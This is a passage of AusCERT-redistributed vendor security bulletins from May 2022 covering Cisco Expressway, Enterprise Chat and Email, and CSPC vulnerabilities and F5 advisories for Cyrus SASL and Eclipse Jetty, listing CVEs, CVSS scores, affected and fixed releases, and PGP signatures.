attacker with read / write privileges to obtain sensitive information on an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information on an affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCwa25061 CVE ID: CVE-2022-20807 Security Impact Rating (SIR): Medium CVSS Base Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N CVE-2022-20809: Cisco Expressway Series and Cisco TelePresence VCS Arbitrary File Write Vulnerability A vulnerability in the logging component of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. This vulnerability is due to the storage of unencrypted credentials in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view the credentials of other users of the shared device. This vulnerability only occurs when debug logging is enabled on the device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCwa25106 CVE ID: CVE-2022-20809 Security Impact Rating (SIR): Medium CVSS Base Score: 4.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the release information in the following table (s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerabilities that are described in this advisory and which release included the fix for these vulnerabilities. Cisco Expressway Series and Cisco TelePresence VCS First Fixed Release Release Earlier than 14.0 Migrate to a fixed release. 14.0 14.0.7 The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory. Exploitation and Public Announcements o The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o These vulnerabilities were found during internal security testing by Jason Crowder of the Cisco Advanced Security Initiatives Group (ASIG). Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2022-MAY-18 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMeMkNZI30y1K9AQiZhBAAnACf99pbG66P3eSs0ZaWCLOj/PfBSJbn vHn0UgZoz4IpaL5cve6wLWzhuF6UAVl8szW2e38xafBPtvlLE9zWGJMto8hczeMq 2l0+U9HStZ28Y/SVZDKvYELHaRlBYFbN11HyNFtKhPPOP+OOVsCm6udda3uVVXK3 RXhUI3cN0VgKhILt+m184nKsWtdvQxjWYLYUlxmj/ejkCivRRr7HghuVdH9sEkza EXeyVPCjE7hHbvN13VwmHtbG+PLwA9Ctrn1NsrwOpbhsHNsS7zXNsO17IeDZ4mjt Yd8JL/c58w9r7rDAJpMVVwQDahZrhbGD38BJfxsKb5CDD/8w1gnWjGm9gKm8fFhb oYksrW1ynjADwUwt25a3COu/5Dyg111y30IopUvPhqvqcPLDlQKCFVfOGnFrkWfP nERl61LA3Oq7h2HOtDpW3i2KIKpWxNCAOdl8JCS7619m3nSdasl/yuwhXHmGPw+Z OFHJgTbuZ8BYT3j9DxWReyDdGxqvtWBJBqoIzpNeY/rFrYuxNQQEeEzSIg2E0nD1 NsRworucOhwD9p/3IVGikqPuGNVX6gBL1vtLbf3gRzhMdyoEeMo5pW3dZLSkGxVc fwEyYU+68Ddj9eXUtu68MSuaGsNr0FX7JS2O4A42guFhLiY+Zd0IaOZVFRHexJaX Ko/7mQ5FAas= =ClG+ -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2450 - [Cisco] Cisco Enterprise Chat and Email: CVSS (Max): 5.4

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2450 Cisco Enterprise Chat and Email Stored Cross-Site Scripting Vulnerability 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Enterprise Chat and Email Publisher: Cisco Systems Operating System: Cisco Resolution: Patch/Upgrade CVE Names: CVE-2022-20802 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2 Comment: CVSS (Max): 5.4 CVE-2022-20802 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) CVSS Source: Cisco Systems Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Enterprise Chat and Email Stored Cross-Site Scripting Vulnerability Priority: Medium Advisory ID: cisco-sa-ece-strd-xss-BqFXO9D2 First Published: 2022 May 18 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCwa92119 CVE Names: CVE-2022-20802 CWEs: CWE-79 Summary o A vulnerability in the web interface of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input that is processed by the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected system. A successful exploit could allow the attacker to execute arbitrary code in the context of the interface or access sensitive, browser-based information. To successfully exploit this vulnerability, an attacker would need valid agent credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2 Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco ECE. For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the release information in the following table (s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability described in this advisory and which release included the fix for this vulnerability. Cisco ECE Software Release First Fixed Release Earlier than 12.6(1) ES2 12.6(1) ES2 The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory. Exploitation and Public Announcements o The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o Cisco would like to thank the security researcher Shahnawaz Shaikh for reporting this vulnerability. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. Related to This Advisory o Cross-Site Scripting URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2022-MAY-18 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMa8kNZI30y1K9AQjI2A/8Dw1wQWfeW1wchNvIw/ONJbuDEeYUnS0L nsbRtQNr5+Sa/jG09uqRuFbA/FAtsYPGKHmvNrubq94+ithoAHLom3pb1IHHHTIv aUvu0gFRQYS/7KOh0/lOcMrnZDHFvG3u+b+JI2F02BwwPuClnl1eGgd2FC/OWfs8 GLekS3HexH1AV4TzuzRN7rsUJ8yeeQ2NgiquYSzmjE0KIxMftoiz0H19r4dRXdgq cKirk4oUTgMQbx0x1ua4kYFU1PgHDRgJJSr6j0ljWxHKjPjIW70Y1tRED9Vbnx6r bU9LM2y7xCMpHFCTHyHSHR23MMP9o+eFMJeb6pQvGKrB3HsYsNgUC60QO1XG2eZe +jFlCDGzbg1ZSsZ8Tu6UpxYF2fTwBaCTQ/DPfM6BWbl8BkWZS+HdnR11aUV/fHYA xPUqIVKJuKlRVVVFBlYN/IGAQrcI8bRMrCTr//U0uJtnO9WX9Zad7vSaJ4zkDCx4 L5Vf6LJmAWus7o4s8okupVxXnZOVrvMCD2NSBbAwsFNsXL/qJmMYr9JtdWqau1va 9VlhCiMU8lFweQU/hSqn59ARxFbt+GIekdy2+OKxnp+rrBv548MnxmTknk5fc1Y9 UbacFySnElfkGOEpDzje1EqGTlGvpQaOlUTdHaWqfn95A6ZIwSeqllMvTu4JdDbu VRH4UOjo3gQ= =zEF1 -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2449 - [Cisco] Cisco Common Services Platform Collector: CVSS (Max): 6.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2449 Cisco Common Services Platform Collector Cross-Site Scripting Vulnerabilities 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Common Services Platform Collector Publisher: Cisco Systems Operating System: Cisco Resolution: Patch/Upgrade CVE Names: CVE-2022-20674 CVE-2022-20673 CVE-2022-20672 CVE-2022-20671 CVE-2022-20670 CVE-2022-20669 CVE-2022-20668 CVE-2022-20667 CVE-2022-20666 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb Comment: CVSS (Max): 6.1 CVE-2022-20673 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) CVSS Source: Cisco Systems Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Common Services Platform Collector Cross-Site Scripting Vulnerabilities Priority: Medium Advisory ID: cisco-sa-cspc-multi-xss-tyDFjhwb First Published: 2022 May 18 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCwa06070 CSCwa15311 CSCwa15485 CSCwa16572 CSCwa17816 CSCwa17857 CSCwa17997 CSCwa23535 CSCwa24820 CVE Names: CVE-2022-20666 CVE-2022-20667 CVE-2022-20668 CVE-2022-20669 CVE-2022-20670 CVE-2022-20671 CVE-2022-20672 CVE-2022-20673 CVE-2022-20674 CWEs: CWE-79 Summary o Multiple vulnerabilities in the web-based management interface of Cisco Common Services Platform Collector (CSPC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco has released software updates to address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco CSPC Software. For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the release information in the following table (s) was accurate. In the following table(s), the left column lists Cisco software releases, and the right column indicates whether a release is affected by the vulnerabilities described in this advisory and which release includes the fix for these vulnerabilities. Cisco CSPC Release First Fixed Release 2.9 and earlier Migrate to a fixed release. 2.10 2.10.0.2 The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory. Exploitation and Public Announcements o The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o These vulnerabilities were found by Dylan Hudson, Kanstantsin Markelau, and Sam Cosentino of Cisco during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. Related to This Advisory o Cross-Site Scripting URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2022-MAY-18 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMWMkNZI30y1K9AQhYLg/9GQyPBUhoOd2V9JG2elkVRLFjypVbUDY5 ux9Pjzb3FrijFnDc/NniH0SG7rdCiVp+7lKknkTCp9MTVf9gET9RAJ2216rjWGGD sucPqdzONVIATc7FDcXVzJ3O1diBRq1ML68Iim1op+xtSUkRqE1UvVzEPM/6Qlfa CDC/5JCwWcjzKsY9jh6kfZpuUGfQzdoUXOSNKOb6XMZe6whNMIuDGLTZJcuZN/wj qpnczs7jfoGP6qvroQf2EQYU97fj4ttLYRMO7ZO59pMQcr6IQ0Blr5twzpDxXNU/ ZgFz7sHrVQM82J5Nv1cSKENGRhjeSiYRXiMYZar2sX0Q3ozSY1+NYmAFq/PGInFb O0LW933ElU3//dt7aYmzCqrrZqTy2UYk29BtCXxSmKUq9mZOO+gQdkfgL4cUQaVh A2nP2C7lgKMR/YPA+1vsGEfhaV8PF6yIp9m0VhsQHpng46BR1X7D6/Tv0bo35vKN RBgczleSI1HxPxGl0660kLC1ielX/qBvwqXF++yNcZHGNRkSKVLh/SIcQlFsZJSb y9l31OzwLXPAvPjaFpNSmxR8+Nj4eiVWwC8OYuGOQ3TeO6Lyj9O2PhZ8zSrqOQZk Wx4lzp1K4yc+8fMHJqwXjwZV2Cet4aqi4je594KMqZKT6OgqFF2RclqnWMbcr11E IPqwbmxbthI= =D5Rp -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2448 - [Appliance] F5 Traffix SDC: CVSS (Max): 8.6

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2448 K82896488: Cyrus SASL vulnerability CVE-2022-24407 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Traffix SDC Publisher: F5 Networks Operating System: Network Appliance Resolution: Patch/Upgrade CVE Names: CVE-2022-24407 Original Bulletin: https://support.f5.com/csp/article/K82896488 Comment: CVSS (Max): 8.6 CVE-2022-24407 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H/E:H/RL:W/RC:C/AR:M/MAV:N/MAC:L/MPR:N/MUI:N) CVSS Source: F5 Networks Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H/E:H/RL:W/RC:C/AR:M/MAV:N/MAC:L/MPR:N/MUI:N - --------------------------BEGIN INCLUDED TEXT-------------------- K82896488: Cyrus SASL vulnerability CVE-2022-24407 Original Publication Date: 19 May, 2022 Security Advisory Description In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL INSERT or UPDATE statement. (CVE-2022-24407) Impact Failure to properly escape SQL input allows an attacker to run arbitrary SQL commands. Security Advisory Status F5 Product Development has assigned SDC-1811 (Traffix SDC) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding security advisory versioning. Note: After a fix is introduced for a given minor branch, that fix applies to all subsequent maintenance and point releases for that branch, and no additional fixes for that branch will be listed in the table. For example, when a fix is introduced in 14.1.2.3, the fix also applies to 14.1.2.4, and all later 14.1.x releases (14.1.3.x., 14.1.4.x). For more information, refer to K51812227: Understanding security advisory versioning. Additionally, software versions preceding those listed in the Applies to (see versions) box of this article have reached the End of Technical Support (EoTS) phase of their lifecycle and are no longer evaluated for security issues. For more information, refer to the Security hotfixes section of K4602: Overview of the F5 security vulnerability response policy. +------------+------+--------------+----------+----------+------+-------------+ | | |Versions known|Fixes | |CVSSv3|Vulnerable | |Product |Branch|to be |introduced|Severity |score^|component or | | | |vulnerable^1 |in | |2 |feature | +------------+------+--------------+----------+----------+------+-------------+ | |17.x |None |Not | | | | | | | |applicable| | | | | +------+--------------+----------+ | | | | |16.x |None |Not | | | | | | | |applicable| | | | | +------+--------------+----------+ | | | |BIG-IP (all |15.x |None |Not |Not |None |None | |modules) | | |applicable|vulnerable| | | | +------+--------------+----------+ | | | | |14.x |None |Not | | | | | | | |applicable| | | | | +------+--------------+----------+ | | | | |13.x |None |Not | | | | | | | |applicable| | | | +------------+------+--------------+----------+----------+------+-------------+ | |8.x |None |Not | | | | |BIG-IQ | | |applicable|Not | | | |Centralized +------+--------------+----------+vulnerable|None |None | |Management |7.x |None |Not | | | | | | | |applicable| | | | +------------+------+--------------+----------+----------+------+-------------+ |F5OS-A |1.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | +------------+------+--------------+----------+----------+------+-------------+ |F5OS-C |1.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | +------------+------+--------------+----------+----------+------+-------------+ |Traffix SDC |5.x |5.2.0 |None |High |8.6 |Cyrus SASL | | | |5.1.0 | | | | | +------------+------+--------------+----------+----------+------+-------------+ ^1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle. ^2The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by installing a version listed in the Fixes introduced in column. If the Fixes introduced in column does not list a version for your branch, then no update candidate currently exists for that branch and F5 recommends upgrading to a version with the fix (refer to the table). If the Fixes introduced in column lists a version prior to the one you are running, in the same branch, then your version should have the fix. Mitigation None Supplemental Information o K41942608: Overview of security advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K8986: F5 software lifecycle policy o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXIOskNZI30y1K9AQhbpw/+L/HZOrHl16kzCcHz2sUBWOzr1lstbe5Y A8GpgodHJqG5avFuXvnw54Q4Y563WcAFbR9BOaVfvUfZVJJTJUkTuFb216HuSYrO Po63/inHJ/MX0T0bNDIy6W5+tPMUwVybT/eeIu21FkzXnyMJ6VnknlcvzKT3VeK4 Y89FJb5kxI5rsDuNzfQ2S3nSgJZJpjYGFeGG9oSwQLsTbbCXuz+IxYsZKvut6KpO VK+pnl6P1Bag+1l0+7qNVgfss3+jv3fpWHc/sDtxazlabdBqSC+dRQlkBLjGIXXj 4PzHIgR2DRGTaU5r7Vf1n3emDfDJpj5CYYvqmweSwAIkpbti2ikPliveXFysgqTB hnV9MYVahQwz6vBID5J1Ck9nIjPKdpphjzRcIS44bKJ4HbKqrjiM0KdsWIabzJJz kZuS2HkcpF8/J9+WaVWt/6K91YVrYBTTq7tNT7Qsi8JhqbxCk3dPhvTuoCa2uHnA jqp8fq/wF/lhlsxPthP999ZrdceDiym/UXzkQiUfOdNKep9x7gYBpknlqFSrZ1J/ WnqaoEq7TrswNqspuWzrcRNfvWJIEqpk7aijJ4n7ZBhQ69kD2TqJDrhzwbhcFdiK Ae7N72GwVt9Muv5t/nM7S2XRnm/I4JwnDKYlvSHBvvsiMzFd8mNonrxfzuYpC2IE HxNvq67wgJQ= =59Zp -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2447 - [Appliance] F5 Products: CVSS (Max): 7.2

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2447 K18484125: Eclipse Jetty vulnerability CVE-2020-27216 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: BIG-IP (all modules) BIG-IQ Centralized Management Traffix SDC Publisher: F5 Networks Operating System: Network Appliance Resolution: Patch/Upgrade CVE Names: CVE-2020-27216 Original Bulletin: https://support.f5.com/csp/article/K18484125 Comment: CVSS (Max): 7.2 CVE-2020-27216 (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H) CVSS Source: F5 Networks Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- K18484125: Eclipse Jetty vulnerability CVE-2020-27216 Original Publication Date: 19 May, 2022 Security Advisory Description In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability. (CVE-2020-27216) Impact A successful exploit could allow an authenticated user to cause a local privilege escalation vulnerability. Security Advisory Status F5 Product Development has assigned ID 1070753 (BIG-IP and BIG-IQ) and ID SDC-1576 and SDC-1578 (Traffix SDC) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding security advisory versioning. Note: After a fix is introduced for a given minor branch, that fix applies to all subsequent maintenance and point releases for that branch, and no additional fixes for that branch will be listed in the table. For example, when a fix is introduced in 14.1.2.3, the fix also applies to 14.1.2.4, and all later 14.1.x releases (14.1.3.x., 14.1.4.x). For more information, refer to K51812227: Understanding security advisory versioning. Additionally, software versions preceding those listed in the Applies to (see versions) box of this article have reached the End of Technical Support (EoTS) phase of their lifecycle and are no longer evaluated for security issues. For more information, refer to the Security hotfixes section of K4602: Overview of the F5 security vulnerability response policy. +------------+------+--------------+----------+----------+------+-------------+ | | |Versions known|Fixes | |CVSSv3|Vulnerable | |Product |Branch|to be |introduced|Severity |score^|component or | | | |vulnerable^1 |in | |2 |feature | +------------+------+--------------+----------+----------+------+-------------+ | |17.x |17.0.0 |None | | | | | +------+--------------+----------+ | | | | |16.x |16.0.0 - |None | | | | | | |16.1.2 | | | | | | +------+--------------+----------+ | | | |BIG-IP (all |15.x |15.1.0 - |None | | | | |modules) | |15.1.5 | |High |7.2 |iControl REST| | +------+--------------+----------+ | | | | |14.x |14.1.0 - |None | | | | | | |14.1.4 | | | | | | +------+--------------+----------+ | | | | |13.x |None |Not | | | | | | | |applicable| | | | +------------+------+--------------+----------+----------+------+-------------+ |BIG-IQ |8.x |8.0.0 - 8.2.0 |None | | | | |Centralized +------+--------------+----------+High |7.2 |Restjavad | |Management |7.x |7.0.0 - 7.1.0 |None | | | | +------------+------+--------------+----------+----------+------+-------------+ |F5OS-A |1.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | 